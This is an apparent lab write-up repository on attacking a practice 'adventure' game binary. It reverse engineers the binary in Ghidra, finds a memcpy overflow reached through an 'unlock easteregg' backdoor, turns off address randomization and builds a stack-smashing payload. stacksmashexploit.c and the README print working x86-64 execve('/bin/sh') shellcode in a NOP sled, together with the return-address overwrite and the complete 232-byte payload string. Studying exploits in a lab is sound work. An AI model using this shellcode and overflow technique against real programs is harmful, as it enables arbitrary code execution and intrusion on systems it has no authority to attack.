├── adventure6.gpr
├── .gitignore
├── .gitattributes
├── adventurev6.zip
├── images
    ├── B5_backdoor.png
    ├── C1_debug_conf.png
    ├── C2_debug_conf.png
    ├── C6_input_text.png
    ├── C7_prgm_crash.png
    ├── C8_prgm_crash.png
    ├── B2_find_memcpy.png
    ├── C10_stack_smash.png
    ├── C3_debug_output.png
    ├── C4_break_point.png
    ├── C5_input_length.png
    ├── A1_running_binary.png
    ├── B1_import_binary.png
    ├── B3_get_vuln_func.png
    ├── B4_Func_CallGraph.png
    └── C9_registers_addr.png
├── stacksmashexploit.c
└── README.md


/adventure6.gpr:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | 


--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 | 


--------------------------------------------------------------------------------
/adventurev6.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/adventurev6.zip


--------------------------------------------------------------------------------
/images/B5_backdoor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/B5_backdoor.png


--------------------------------------------------------------------------------
/images/C1_debug_conf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/C1_debug_conf.png


--------------------------------------------------------------------------------
/images/C2_debug_conf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/C2_debug_conf.png


--------------------------------------------------------------------------------
/images/C6_input_text.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/C6_input_text.png


--------------------------------------------------------------------------------
/images/C7_prgm_crash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/C7_prgm_crash.png


--------------------------------------------------------------------------------
/images/C8_prgm_crash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/C8_prgm_crash.png


--------------------------------------------------------------------------------
/images/B2_find_memcpy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/B2_find_memcpy.png


--------------------------------------------------------------------------------
/images/C10_stack_smash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/C10_stack_smash.png


--------------------------------------------------------------------------------
/images/C3_debug_output.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/C3_debug_output.png


--------------------------------------------------------------------------------
/images/C4_break_point.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/C4_break_point.png


--------------------------------------------------------------------------------
/images/C5_input_length.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/C5_input_length.png


--------------------------------------------------------------------------------
/images/A1_running_binary.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/A1_running_binary.png


--------------------------------------------------------------------------------
/images/B1_import_binary.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/B1_import_binary.png


--------------------------------------------------------------------------------
/images/B3_get_vuln_func.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/B3_get_vuln_func.png


--------------------------------------------------------------------------------
/images/B4_Func_CallGraph.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/B4_Func_CallGraph.png


--------------------------------------------------------------------------------
/images/C9_registers_addr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arvindpj007/Buffer-Overflow-Attack-Adventure/HEAD/images/C9_registers_addr.png


--------------------------------------------------------------------------------
/stacksmashexploit.c:
--------------------------------------------------------------------------------
 1 | #include <stdlib.h>
 2 | #include <stdio.h>
 3 | #include <string.h>
 4 | union
 5 | {
 6 |     unsigned long long int llint;
 7 |     unsigned char byte[8];
 8 | } longlongintUnion;
 9 | 
10 | //Places the bytes for our raw 64-bit Linux/X86-64 shellcode in memory (will specifically be in the .data section)
11 | //Added nop padding after shellcode
12 | char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x48\xbb\xff\x2f\x62\x69\x6e\x2f" \
13 | 			       "\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48" \
14 | 				   "\x89\xe6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\x48\x89\xd7\xb0" \
15 | 				   "\x3c\x0f\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
16 | 
17 | //manually determined to overflow retptraddr with shellcodeaddr
18 | char spacer[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
19 | 				"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
20 | 				"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
21 | 				"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
22 | 				"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
23 | 				"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
24 | 				"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
25 | 				"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
26 | 				"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
27 | 				"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
28 | 				"\x90\x90\x90\x90\x90\x90\x90\x90";
29 | 
30 | int main(int argc, char *argv[]) {
31 | 	char** targv;//array of arguments variable to pass in to real_main(targc,targv)
32 |     int targc;//number of arguments variable to pass in to real_main(targc,targv)
33 |     int tstatus;//variable to store the return status from calling real_main(targc,targv)
34 | 
35 |     unsigned long long int shellcodeaddr;
36 |     unsigned long long int oldrbp;
37 | 
38 |     char *taintedbuf;
39 | 	int taintedbufsize=232;
40 | 	taintedbuf=malloc(taintedbufsize);
41 | 
42 |     //checks the usage for calling wrapper
43 |     if (argc != 3) {
44 |     	printf("Warning, incorrect args. Usage is $ ./stacksmashexploit <shellcodeAddr> <oldrbp>\n");
45 |     	return(EXIT_FAILURE);
46 |     }
47 | 
48 |     sscanf(argv[1],"%llx",&shellcodeaddr);
49 |     sscanf(argv[2],"%llx",&oldrbp);
50 | 
51 | 	memmove(taintedbuf,shellcode,sizeof(shellcode));//copy the shellcode into the taintedbuf
52 | 	memmove(taintedbuf+sizeof(shellcode)-1,spacer,sizeof(spacer));//copy the spacer into the taintedbuf
53 | 
54 | 	char mybuf [8] __attribute__ ((aligned (8)));
55 | 	//old rbp
56 | 	longlongintUnion.llint= oldrbp;
57 | 	mybuf[0]=longlongintUnion.byte[0];
58 | 	mybuf[1]=longlongintUnion.byte[1];
59 | 	mybuf[2]=longlongintUnion.byte[2];
60 | 	mybuf[3]=longlongintUnion.byte[3];
61 | 	mybuf[4]=longlongintUnion.byte[4];
62 | 	mybuf[5]=longlongintUnion.byte[5];
63 | 	mybuf[6]=longlongintUnion.byte[6];
64 | 	mybuf[7]=longlongintUnion.byte[7];
65 | 	memmove(taintedbuf+sizeof(shellcode)+sizeof(spacer)-2,(char*)mybuf, 8);
66 | 
67 | 	//ret fptr
68 | 	longlongintUnion.llint= shellcodeaddr;
69 | 	mybuf[0]=longlongintUnion.byte[0];
70 | 	mybuf[1]=longlongintUnion.byte[1];
71 | 	mybuf[2]=longlongintUnion.byte[2];
72 | 	mybuf[3]=longlongintUnion.byte[3];
73 | 	mybuf[4]=longlongintUnion.byte[4];
74 | 	mybuf[5]=longlongintUnion.byte[5];
75 | 	mybuf[6]=longlongintUnion.byte[6];
76 | 	mybuf[7]=longlongintUnion.byte[7];
77 | 	memmove(taintedbuf+sizeof(shellcode)+sizeof(spacer)+8-2,(char*)mybuf, 8);
78 | 
79 | 	for (int i=0;i<taintedbufsize;i++) {
80 | 		printf("\\x%02x",(unsigned char)taintedbuf[i]);
81 | 	}
82 | 	printf("\n");
83 | }
84 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Buffer Overflow Attack
  2 | 
  3 | Performing Buffer Overflow attack using stack smashing approach to obtain the shell. Given a C compiled vulnerable software, with the help of reverse engineering and debugging the attack had to be conducted to obtain the shell.
  4 | 
  5 | ## Prepare Ubuntu VM
  6 | Follow these steps to setup the VM and import the binary:
  7 | 1. Install the prerequisite libncurses5-dev
  8 |         
  9 |         apt-get install libncurses5-dev
 10 | 2. Make the adevture-qnx folder 
 11 | 
 12 |         mkdir /usr/share/adventure-qnx/
 13 | 3. Copy the adven[1-4].txt files from the zip file into /usr/share/adventure-qnx/
 14 | 
 15 |         sudo cp ./advent*.txt  /usr/share/adventure-qnx/
 16 | 4. Try running the binary file (if the file is not executable change the mode).
 17 | 
 18 |         ./adventurev3_stripped
 19 |     ![Running the Binary](./images/A1_running_binary.png)
 20 | 
 21 | ## Reverse Engineer Using Ghidra
 22 | Follow these steps to reverse engineer the binary using Ghidra:
 23 | 1. Import the 64-bit Linux Binary into Ghidra ()
 24 | 
 25 |     ![Importing the Binary](./images/B1_import_binary.png)
 26 | 2. After Ghidra analyses the binary, by going through the SymbolTree a vulnerable memory function is found that this software uses. This function is found to be "memcpy", a vulnerable C function that is being used by this application.
 27 | 
 28 |     ![Finding Vulnerable Funciton](./images/B2_find_memcpy.png)
 29 | 3. Using this knowledge the vulnerable function call that calls this function can be observed and also a Functon Call Graph can be plotted correspondingly.
 30 | 
 31 |     The vulnerable function is found as:
 32 | 
 33 |     ![Finding Vulnerable Funciton](./images/B3_get_vuln_func.png)
 34 | 
 35 |     The Functon Call Graph is obtained as:
 36 | 
 37 |     ![Plotting Function Call Graph](./images/B4_Func_CallGraph.png)
 38 | 
 39 | 4. By going through the Function Call Graph it can identified that there is backdoor function that calls out this newly identified vulnerable function. 
 40 | 
 41 | 
 42 |     ![Backdoor Function](./images/B5_backdoor.png)
 43 | 
 44 |     It is seen that the backdoor function can be accessed by the easter egg code "unlock easteregg". This can be used to access the vulnerable function and exploit the memcpy function call.
 45 | 
 46 | ## Debugging using Eclipse
 47 | 
 48 | Initially we have to setup the debugging environment:
 49 | 1. Set GDB command file `~/.gdbinit` with the following content:
 50 | 
 51 |         set disassembly-flavor intel
 52 |         set disable-randomization on
 53 | 2. Set Address Space Randomization off with the following command: 
 54 | 
 55 |         sudo sysctl kernel.randomize_va_space=0
 56 | 3. Eclipse is used for debugging, initially a C/C++ project (C Managed and Linux GCC toolchain) is created and the binary file along with the associated text files are copied. 
 57 | 
 58 | 4. Now the remote debug configurations for the project is set. This is done by providing the application path in the debug configurations.
 59 | 
 60 |     ![Debug Configurations 1](./images/C1_debug_conf.png)
 61 | 
 62 |     The location of the GDB command file is also specified as `~/.gdbinit`:
 63 | 
 64 |     ![Debug Configurations 2](./images/C2_debug_conf.png)
 65 | 
 66 | 5. Upon debugging the dissasembly can be viewed. The debugger can be paused to analyze the disassembly. 
 67 | 
 68 |     ![Debug Output](./images/C3_debug_output.png)
 69 | 
 70 | 6. The easteregg code `unlock easteregg` that was found by reverse engineering can be used to access the vulnerable function. A break point was placed where the `memcpy` function is being called.
 71 | 
 72 |     ![Adding Breakpoint](./images/C4_break_point.png)
 73 | 
 74 | 7. Use instruction stepping mode to analyze the memory for the register `$rbp`  after providing inputs for the vulnerable function. Initially a small length of `32` is provided as the first input.
 75 | 
 76 |     ![Input Length 1](./images/C5_input_length.png)
 77 | 
 78 |     Correspongingly input of 32 `\x12` is provided for argument2. This input can be seen in the memory browser of `$rbp`.
 79 | 
 80 |     ![Input Text 1](./images/C6_input_text.png)
 81 | 
 82 | 8. This knowledge can be used to construct a string of a particular length that can crash the application. By providing the input for length as `300` for argument1 and as 300 `\x90` for argument2, it is seen that the program crashes.
 83 | 
 84 |     ![Program Crash](./images/C7_prgm_crash.png)
 85 | 
 86 |     ![Program Crash](./images/C8_prgm_crash.png)
 87 | 
 88 | 9. It is observed that the $rbp points to the address "0x00007FFFFFFFDEF0" from the Registers view and the local variables are written from the address "0x00007FFFFFFFDD18" from the stack frame. The difference between the address in decimal is "472", then the required length is "(472-8)/2 = 232"
 89 | 
 90 |     ![Register Addresses](./images/C9_registers_addr.png)
 91 | 
 92 | 10. With this knowledge a shellcode can be constructed, the C code stacksmashexploit.c can be used or a hexadecimal string consisting of shellcode in the middle and the return address of the shellcode present at the end should be provided. 
 93 | 
 94 |     The format will be similar to \<NOP sled\> \<ShellCode\>\<more NOPs\> \<return address of shellcode\> \<valid return address\>. The NOPs are placed such that the $rbp register will point towards the shellcode.
 95 | 
 96 |     Using this knowledge following string of length 232 was constructed: 
 97 | 
 98 |     \x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\x48\x31\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\x48\x89\xd7\xb0\x3c\x0f\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x18\xDD\xFF\xFF\xFF\x7F\x00\x00\x18\xDD\xFF\xFF\xFF\x7F\x00\x00
 99 | 
100 |     Here the return adddress is provided as the beginning of the stack which is `0x00007FFFFFFFDD18` where the shellcode is placed after a few NOPs.
101 |     
102 |     Providing 232 and this string as the input for the arguments we will able to obtain the shell as shown below:
103 | 
104 |     ![Stack Smash](./images/C10_stack_smash.png)
105 | 
106 | 
107 |     Hence the stack smashing was successful and the shell was obtained.
108 | 


--------------------------------------------------------------------------------